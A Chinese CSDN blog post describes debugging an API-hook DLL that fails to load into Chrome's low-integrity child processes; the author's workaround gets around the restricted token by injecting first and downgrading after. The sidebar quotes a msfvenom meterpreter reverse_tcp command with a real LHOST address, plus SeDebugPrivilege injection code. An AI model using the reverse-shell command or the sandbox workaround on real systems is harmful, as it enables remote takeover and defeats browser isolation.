向低权限(低完整性?)进程注入的问题

最新推荐文章于 2022-12-05 23:39:07 发布
最新推荐文章于 2022-12-05 23:39:07 发布
阅读量1.3k 收藏
点赞数
分类专栏: Windows API Hook 文章标签: API Hook CreateProcess API钩子 chrome
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/myjisgreat/article/details/46481455
版权


向低权限(低完整性?)进程注入的问题

搬运自我的百度空间

    一个让人崩溃的bug:Chrome程序在钩子下运行失败。正常情况下,在HOOK了CreateProcessInternalW后,我的钩子会在新进程插入自己的DLL进行连环钩子。调试了几天不见端倪。在windbg中看到卡住的原因是Chrome一个子进程在创建时Terminate了自己。使用windbg追溯到是LdrInitializeProcess的初始化进程操作失败,错误码是ACCESS_DENIED。查看了好多资料,包括reactos的代码,都不见LDR会产生ACCESS_DENIED的错误。
    然后发现如果不在进程创建时用Detours插入我的DLL,就不会产生错误。发现MSDN中CreateProcess中写道: If a required DLL cannot be located or fails to initialize, the process is terminated.联想到可能是DLL插入错误。
    仍然死胡同。最后发现Chrome的CreateProcessInternalW的一个参数hToken也是决定初始化成功与否的因素。结果使用较高权限的Token来创建子进程,Chrome正常运行了

    应该是Chrome的子进程的Token是低权限的(低完整性?),连我的DLL也不允许加载,才造成这个问题。我的解决办法是先用当前进程的token创建进程,等DLL加载完毕再把低权限Token复制给新进程,完成降级。
    为什么IE也是低权限的,却没有这个问题?。。。。。。


    myjisgreat
    关注
    专栏目录
    创建一个everyone可以访问权限的注册表键值
    11-17
    创建一个everyone可以访问权限的注册表键值 The following example creates a security descriptor for a new registry key using the following process. Similar code can be used to create a security descriptor for other object types.
    windows核心编程-windows完整性机制
    qq_22423659的博客
    11-27 1338
    进程的内核对象是等着别人拿着令牌访问我们的 令牌是我们拿着令牌区访问别人的内核对象的,与别的安全描述符权限比较 windows完整性机制:是对windows安全授权的一个补充 安全模块在拿token和安全描述符SECURITY_DESCRIPTOR比照之前,还会做一个完整性检查的工作 完整性等级的不能访问完整性等级高的,如果没有设置,内核对象会设置默认的完整性等级medium。 让进程
    DLL注入提升进程权限(有时还需要注入程序使用管理员权限运行)
    csdn_gddf102384398的博客
    06-10 1315
    void SetToken() { HANDLE hToken; if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) { printf("打开进程的访问令牌失败\n"); return; } LUID luid; if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid)) { prin
    Load and Unload
    求索
    12-23 997
    Load and Unload
    【小迪安全day13】WEB漏洞——SQL注入之MYSQL注入
    最新发布
    RichUee的博客
    12-05 1354
    MYSQL注入中首先要明确当前注入权限,高权限注入时有更多的攻击手法,有的能直接进行getshell。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。
    LdrInitializeThunk 解析
    热门推荐
    趁着年轻,希望我们不会让自己失望
    06-26 1万+
    LdrInitializeThunk()    Windows 的 DLL 装入(除 ntdll.dll 外)和连接是通过 ntdll.dll 中的一个函数LdrInitializeThunk()实现的.    在进入这个函数之前,目标 EXE 映像已经被映射到当前进程的用户空间,系统 DLL ntdll.dll 的映像也已经被映射, 但是并没有在 EXE 映像与 ntdll.dll 映像之间
    Windows 8的用户模式Shim Engine小探及利用
    dengliang7440的博客
    03-29 885
    转载:https://bbs.pediy.com/thread-175483.htmWindows Shim Engine,即Windows 兼容性模式实现引擎,在exe文件的属性对话框中有一个兼容性选项卡,用户可设置此exe程序完美工作的系统版本,Windows会尝试模拟老的系统环境运行此程序。那Windows是如何模拟的呢?Windows认为老程序出问题的原因在于它们调用的API上,...
    Windows高权限程序以权限启动子进程
    旋律的博客
    03-08 821
    Windows高权限程序以权限启动子进程 windows中父进程为高权限如何以权限启动子进程,在本文中给出一种方法,供读者参考。 实现思路: 再任务管理其中找到一个权限的程序,一般explorer.exe是以当前用户普通权限启动。我们这里使用explorer.exe为例。 首先需要根据程序名获取explorer.exe的token,并根据这个token利用DuplicateTokenEx函数复制一个新的token用于创建新的子进程。利用这个token创建新的环境变量。然后利用新的token和环.
    windows用户态调试
    hb_zxl的专栏
    05-09 1084
    windows用户态调试 打开windows的记事本小程序,windbg attach到这个进程,发现notepad不能动了,这是用户态调试的特点: 今天调试模式,应用程序所有线程都处于freeze状态。 观察一下线程状态: 会看到有6个线程。 0:006> ~* 0 Id: 1de4.1f6c Suspend: 1 Teb: 000007ff`fffdc000 Unfrozen Start: notepad!WinMainCRTStartup (00000000`ff683ac...
    软件调试基础
    qq_18811919的博客
    07-12 1406
    作为一个程序员必须对软件调试的过程有一个基本的认识。
    PE加载器的实现
    08-13 1369
    来源:http://blog.vckbase.com/windowssky  对于加壳软件的开发者,掌握PE Loader的实现是最基本的技术;因为壳运行结束后,你要仿照PE加载器去Load映象体,我曾看过UPX的开源代码,全手工打造PE,实现的也是极其复杂,是学习加壳,脱壳和开发加壳软件的上乘资料.  在ReatOs和Nt4.0上找到了其实现,前者实现的比较清晰,不过还是看看Nt4.0的实现吧/
    Mysql漏洞利用(越权,实战怎么从权限拿到root密码)
    07-30
    Mysql漏洞利用(越权,实战怎么从权限拿到root密码)
    Windows下如何创建权限进程
    顺其自然~专栏
    07-28 851
    在使用Sysinternals出品的 Process Explorer 过程中,对 “Run as Limited User” 功能的实现方式颇感兴趣,一番搜寻之下发现Mark大神在《Running as Limited User – the Easy Way》中对该功能的实现做了相关的阐述: use the CreateRestrictedToken API to create a security context, called a token, that’s a stripped-down v..
    权限提升-令牌窃取&进程注入-提权
    weixin_45701675的博客
    11-19 391
    令牌窃取 演示服务器: Win2012 腾讯云服务器 假冒令牌可以假冒一个网络中的另一个用户进行各类操作。 所以当一个攻击者需要域管理员的操作权限时候,需通过假冒域管理员的令牌进行攻击。 本地权限 - Test in Win2012腾讯云服务器 msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=3333 -f exe -o msf.exe 配置监听会话 use exploit/multi/han...
    C++实现DLL注入进程详解
    "本文主要介绍了如何使用C++实现DLL注入其他进程的技术,涉及到LoadLibrary函数、CreateRemoteThread API以及DLL的生命...在实际应用中,必须谨慎处理权限、线程同步和内存管理等问题,以确保程序的稳定性和安全性。
    评论
    添加红包

    请填写红包祝福语或标题

    红包个数最小为10个

    红包金额最低5元

    当前余额3.43前往充值 >
    需支付:10.00
    成就一亿技术人!
    领取后你会自动成为博主和红包主的粉丝 规则
    hope_wisdom
    发出的红包
    实付
    使用余额支付
    点击重新获取
    扫码支付
    钱包余额 0

    抵扣说明:

    1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
    2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

    余额充值